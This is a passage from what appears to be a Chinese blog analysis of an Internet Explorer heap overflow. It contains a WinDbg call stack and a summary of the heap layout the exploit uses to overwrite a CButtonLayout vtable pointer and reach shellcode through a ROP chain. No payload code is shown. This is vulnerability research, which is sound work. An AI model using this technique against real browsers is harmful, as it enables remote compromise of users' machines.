0278da28 687a68c7 00002034 0278dac8 00000113 mshtml!CStackDataAry<TIMERTHREADADVISE,12>::GetStackSize+0xb6

0278da4c 7578c4e7 001b0272 00000425 00002034 mshtml!GlobalWndProc+0x183

0278da78 7578c5e7 687a6853 001b0272 00000113 USER32!InternalCallWinProc+0x23

0278daf0 7578cc19 00000000 687a6853 001b0272 USER32!UserCallWinProcCheckWow+0x14b (FPO: [Non-Fpo])

0278db50 7578cc70 687a6853 00000000 0278fc70 USER32!DispatchMessageWorker+0x35e (FPO: [Non-Fpo])

0278db60 6e3b4bec 0278db88 00000000 00a11e10 USER32!DispatchMessageW+0xf (FPO: [Non-Fpo])

0278fc70 6e3c4f62 0037d2a8 00000000 00330e38 IEFRAME!CTabWindow::_TabWindowThreadProc+0x54b (FPO: [Non-Fpo])

0278fd28 75a35c2b 00a11e10 00000000 0278fd44 IEFRAME!LCIETab_ThreadProc+0x2c1 (FPO: [Non-Fpo])

0278fd38 76f43c45 00330e38 0278fd84 772437f5 iertutil!CIsoScope::RegisterThread+0xab (FPO: [Non-Fpo])

0278fd44 772437f5 00330e38 753cecde 00000000 kernel32!BaseThreadInitThunk+0xe (FPO: [Non-Fpo])

0278fd84 772437c8 75a35c1d 00330e38 00000000 ntdll!__RtlUserThreadStart+0x70 (FPO: [Non-Fpo])

0278fd9c 00000000 75a35c1d 00330e38 00000000 ntdll!_RtlUserThreadStart+0x1b (FPO: [Non-Fpo])

Call调用之后,进入rop chain。

 

3、小结

在溢出内存处的布局是:

被溢出内存块(0xfc) | 字符A(0x100)| 字符B(0x100)| CButtonLayout(0xfc)

由于堆上的内存块以8字节为单位,所以0xfc的块实际占内存为0x100。

      当堆溢出的时候,将会改写CButtonLayout的虚表指针,在GC之后,调用CButtonLayout的虚函数,最终进入到攻击者的shellcode。

 

 

  评论这张
 
阅读(534)| 评论(0)
推荐 转载

历史上的今天

在LOFTER的更多文章

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2017